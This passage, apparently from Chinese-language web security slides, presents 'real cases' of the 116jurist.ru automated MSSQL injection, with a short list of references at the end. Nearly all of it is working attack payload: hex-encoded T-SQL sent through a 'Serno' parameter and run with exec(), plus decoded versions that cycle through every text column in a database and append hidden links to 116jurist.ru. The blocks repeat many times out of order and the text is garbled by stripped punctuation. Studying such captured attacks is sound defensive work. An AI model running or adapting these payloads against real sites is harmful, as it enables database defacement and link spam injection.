657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448

3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162

6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434

8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040

46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272

b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920

4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544

f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616

26c655f437572736f72+as+varchar(8000))+exec(s)--

MSSQL實際案例 - 116juristru自動化注入(34)

bull 201212xx 100344

bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66

66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204

445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142

4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4

12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865

726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74

657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448

3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162

6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434

8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040

46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275

d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b

275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746

53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e

3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275

203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455

44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c

4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc

har(8000))+exec(s)--

MSSQL實際案例 - 116juristru自動化注入解碼(44)

bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select

cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE

in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and

ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)

BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]

like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor

bull

bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select

cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE

in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and

ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)

BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO

TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor

bull

bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select

cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE

in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and

ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)

BEGIN EXEC(UPDATE [+T+] SET

[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt

stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM

Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor

MSSQL實際案例 - 116juristru自動化注入(14)

bull 201212xx 100331

bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66

66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204

445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142

4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4

12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865

726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74

657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448

3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162

6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434

8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040

46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275

d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249

4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b

40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652

4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43

7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--

MSSQL實際案例 - 116juristru自動化注入(24)

bull 201212xx 100333

bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66

66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204

445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142

4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4

12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865

726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74

657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448

3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162

6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434

8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040

46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272

b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920

4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544

f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616

26c655f437572736f72+as+varchar(8000))+exec(s)--

MSSQL實際案例 - 116juristru自動化注入(34)

bull 201212xx 100344

bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66

66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204

445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142

4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4

12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865

726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74

657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448

3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162

6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434

8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040

46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275

d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b

275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746

53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e

3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275

203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455

44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c

4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc

har(8000))+exec(s)--

MSSQL實際案例 - 116juristru自動化注入解碼(44)

bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select

cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE

in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and

ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)

BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]

like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor

bull

bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select

cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE

in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and

ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)

BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO

TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor

bull

bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select

cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE

in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and

ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)

BEGIN EXEC(UPDATE [+T+] SET

[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt

stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM

Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor

MSSQL實際案例 - 116juristru自動化注入(24)

bull 201212xx 100333

bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66

66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204

445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142

4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4

12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865

726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74

657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448

3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162

6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434

8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040

46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272

b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920

4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544

f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616

26c655f437572736f72+as+varchar(8000))+exec(s)--

MSSQL實際案例 - 116juristru自動化注入(34)

bull 201212xx 100344

bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66

66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204

445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142

4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4

12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865

726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74

657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448

3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162

6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434

8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040

46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275

d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b

275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746

53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e

3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275

203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455

44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c

4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc

har(8000))+exec(s)--

MSSQL實際案例 - 116juristru自動化注入解碼(44)

bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select

cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE

in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and

ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)

BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]

like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor

bull

bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select

cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE

in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and

ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)

BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO

TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor

bull

bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select

cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE

in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and

ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)

BEGIN EXEC(UPDATE [+T+] SET

[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt

stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM

Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor

MSSQL實際案例 - 116juristru自動化注入(34)

bull 201212xx 100344

bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66

66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204

445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142

4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4

12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865

726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74

657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448

3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162

6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434

8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040

46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275

d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b

275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746

53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e

3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275

203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455

44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c

4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc

har(8000))+exec(s)--

MSSQL實際案例 - 116juristru自動化注入解碼(44)

bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select

cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE

in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and

ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)

BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]

like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor

bull

bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select

cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE

in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and

ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)

BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO

TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor

bull

bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select

cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE

in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and

ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)

BEGIN EXEC(UPDATE [+T+] SET

[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt

stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM

Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor

MSSQL實際案例 - 116juristru自動化注入解碼(44)

bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select

cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE

in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and

ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)

BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]

like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor

bull

bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select

cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE

in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and

ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)

BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO

TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor

bull

bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select

cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE

in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and

ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)

BEGIN EXEC(UPDATE [+T+] SET

[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt

stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM

Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor

參考資料

bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012

bull MySQL String Functions 51

bull MySQL Miscellaneous Functions 51

bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话

bull Shazin Sadakath Time Based SQL Injection using heavy queries in

MySQL

bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008